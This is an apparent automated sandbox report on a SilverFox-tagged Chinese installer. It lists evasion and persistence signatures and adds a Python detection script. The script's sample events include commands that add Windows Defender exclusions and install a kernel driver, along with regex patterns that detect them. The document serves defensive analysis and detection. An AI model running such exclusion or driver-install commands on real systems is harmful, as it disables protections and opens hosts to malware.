Windows Analysis Report
#U5b89#U88c5#U52a9#U624b_2.0.6.exe

Overview

General Information

Sample name: #U5b89#U88c5#U52a9#U624b_2.0.6.exe (the #Uxxxx sequences are the sandbox's escaping of the non-ASCII characters in the original filename; they decode to 安装助手_2.0.6.exe, "Installation Assistant 2.0.6")
Renamed because the original name is a hash value
Original sample name: _2.0.6.exe
Analysis ID: 1579778
MD5: 2fab10855efc0dc62a255ff1e6ec8fa6
SHA1: 0d69a4ea968d50370ee5f7d6e78252f5f61b75f5
SHA256: 869de4431ad5ea6b7513c3e12ff32ecd8b0e93e33c5ab6e3de7bf90de55edc23
Tags: exe, SilverFox, winos, user-kafan_shengui

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Contains functionality to hide a thread from the debugger
Found driver which could be used to inject code into processes
Hides threads from debuggers
Loading BitLocker PowerShell Module
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: New Kernel Driver Via SC.EXE
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
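
Three of the Sigma hits above (Powershell Base64 Encoded MpPreference Cmdlet, Powershell Defender Exclusion, New Kernel Driver Via SC.EXE) key on process command lines. The following Python is an added example, not part of the Joe Sandbox report or of the sample, showing how those detections are implemented and evaluated against constructed process-creation events. The report does not reveal the actual PowerShell script or the sc.exe arguments, so the excluded directory (the 7zr.exe drop location from the report) and the driver name `hypo_drv` in the sample events are assumptions.

```python
"""Command-line detections for three signatures in the list above:
'Powershell Base64 Encoded MpPreference Cmdlet', 'Powershell Defender
Exclusion' and 'New Kernel Driver Via SC.EXE'. Added example; the events
it scans are constructed, not taken from the report."""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand. Requiring
# whitespace right after the switch keeps -ExecutionPolicy from matching.
_ENC_ARG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
# Add-/Set-MpPreference followed by one of the exclusion parameters.
_MPPREF = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension|IpAddress)\b",
    re.I | re.S)
# 'sc create <svc> type= kernel ...' registers a kernel driver service.
_SC_KERNEL = re.compile(r"\bcreate\b.*\btype=\s*kernel\b", re.I)


def decode_encoded_command(cmdline):
    """Return the script passed via -EncodedCommand, or None.
    PowerShell base64-encodes the UTF-16LE bytes of the script."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event):
    """Return the names of the rules an event matches (possibly none)."""
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"]
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        if _MPPREF.search(cmd):
            hits.append("powershell_defender_exclusion")
        decoded = decode_encoded_command(cmd)
        if decoded and _MPPREF.search(decoded):
            hits.append("powershell_base64_mppreference")
    if image == "sc.exe" and _SC_KERNEL.search(cmd):
        hits.append("new_kernel_driver_via_sc")
    return hits


# Constructed sample events. The excluded directory is the 7zr.exe drop
# location seen in the report, but the report does not show the real script,
# so using it as the exclusion target is an assumption; 'hypo_drv' is a
# hypothetical driver name.
EXCLUSION_SCRIPT = "Add-MpPreference -ExclusionPath 'C:\\Program Files (x86)\\Windows NT'"
ENCODED_SCRIPT = base64.b64encode(EXCLUSION_SCRIPT.encode("utf-16-le")).decode("ascii")
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SC_IMAGE = r"C:\Windows\System32\sc.exe"

SAMPLE_EVENTS = [
    {"image": PS_IMAGE, "cmdline": "powershell.exe -NoProfile -ExecutionPolicy Bypass -enc " + ENCODED_SCRIPT},
    {"image": PS_IMAGE, "cmdline": "powershell.exe Set-MpPreference -ExclusionProcess 7zr.exe"},
    {"image": SC_IMAGE, "cmdline": r"sc create hypo_drv type= kernel binPath= C:\Windows\Temp\hypo_drv.sys"},
    {"image": SC_IMAGE, "cmdline": "sc query wuauserv"},                                  # benign
    {"image": PS_IMAGE, "cmdline": "powershell.exe -ExecutionPolicy Bypass Get-MpPreference"},  # benign
]


def scan(events):
    """Map each event's command line to the rules it triggered."""
    return [(e["cmdline"], classify(e)) for e in events]


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(", ".join(hits) or "-", "|", cmdline[:70])
```

The encoded form is decoded before matching because a plain substring rule on the command line never sees `MpPreference` inside the base64 blob; only the two benign events come back empty.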

Classification

AV Detection

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Virustotal: Detection: 6%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 83.1% probability

Compliance

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: c:\builddir\threat~1.26\drivers\tfsysmon\objfre_wnet_amd64\amd64\TfSysMon.pdb source: 7zr.exe, 0000000C.00000003.2140314078.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, 7zr.exe, 0000000C.00000003.2140505560.0000000001240000.00000004.00001000.00020000.00000000.sdmp, tProtect.dll.12.dr

Spreading

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA1AEC0 FindFirstFileA,FindClose, 6_2_6CA1AEC0
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF6868 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW, 10_2_00AF6868
Source: C:\Program Files (x86)\Windows NT\7zr.exe Code function: 10_2_00AF7496 __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW, 10_2_00AF7496

Networking

Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0H
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000003.2091294061.0000000004150000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2278753916.000000006CA58000.00000008.00000001.01000000.00000009.sdmp, 7zr.exe.6.dr, hrsw.vbc.6.dr, update.vac.2.dr, update.vac.6.dr String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: http://www.metalinker.org/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://aria2.github.io/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://aria2.github.io/Usage:
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000002.2273779196.00000000047C9000.00000004.00001000.00020000.00000000.sdmp, is-0F5J3.tmp.6.dr String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr String found in binary or memory: https://www.innosetup.com/
Source: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080391705.000000007EF3B000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.exe, 00000000.00000003.2080019112.0000000003390000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000002.00000000.2082091796.00000000007C1000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp, 00000006.00000000.2103564048.000000000115D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.6.tmp.0.dr String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Process information set: 01 00 00 00 (ProcessBreakOnTermination = 1: the process marks itself critical, so terminating it triggers a bugcheck; this is the BreakOnTermination behaviour listed under Signatures)

System Summary

Source: update.vac.2.dr Static PE information: section name: .=~
Source: hrsw.vbc.6.dr Static PE information: section name: .=~
Source: update.vac.6.dr Static PE information: section name: .=~
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3886
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25120 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle, 6_2_6CA25120
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3C62
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3D18
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA25D60 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction, 6_2_6CA25D60
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3D62
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A39CF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread, 6_2_6C8A3A6A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A1950 CreateFileA,DeviceIoControl,CloseHandle, 6_2_6C8A1950
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor, 6_2_6C8A4754
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8A4754 6_2_6C8A4754
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6C8B4A27 6_2_6C8B4A27
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA21880 6_2_6CA21880
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA26A43 6_2_6CA26A43
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA86CE0 6_2_6CA86CE0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF4DE0 6_2_6CAF4DE0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD6D10 6_2_6CAD6D10
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA58EA1 6_2_6CA58EA1
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAAAEEF 6_2_6CAAAEEF
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADEEF0 6_2_6CADEEF0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA72EC9 6_2_6CA72EC9
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAA4896 6_2_6CAA4896
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEC8D0 6_2_6CAEC8D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE6820 6_2_6CAE6820
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACE810 6_2_6CACE810
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF4870 6_2_6CAF4870
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF6999 6_2_6CAF6999
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEA930 6_2_6CAEA930
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD6900 6_2_6CAD6900
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAFA91A 6_2_6CAFA91A
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA58972 6_2_6CA58972
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE8950 6_2_6CAE8950
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE4AA0 6_2_6CAE4AA0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAFAA00 6_2_6CAFAA00
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAB0A52 6_2_6CAB0A52
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CACAB90 6_2_6CACAB90
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA60BCA 6_2_6CA60BCA
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEEBC0 6_2_6CAEEBC0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CA70B66 6_2_6CA70B66
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAB84AC 6_2_6CAB84AC
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE4489 6_2_6CAE4489
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADE4D0 6_2_6CADE4D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD2580 6_2_6CAD2580
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CADC580 6_2_6CADC580
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAD45D0 6_2_6CAD45D0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAC2521 6_2_6CAC2521
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE8520 6_2_6CAE8520
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAF46C0 6_2_6CAF46C0
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAEE600 6_2_6CAEE600
Source: C:\Users\user\AppData\Local\Temp\is-6SCB4.tmp\#U5b89#U88c5#U52a9#U624b_2.0.6.tmp Code function: 6_2_6CAE67A0 6_2_6CAE67A0
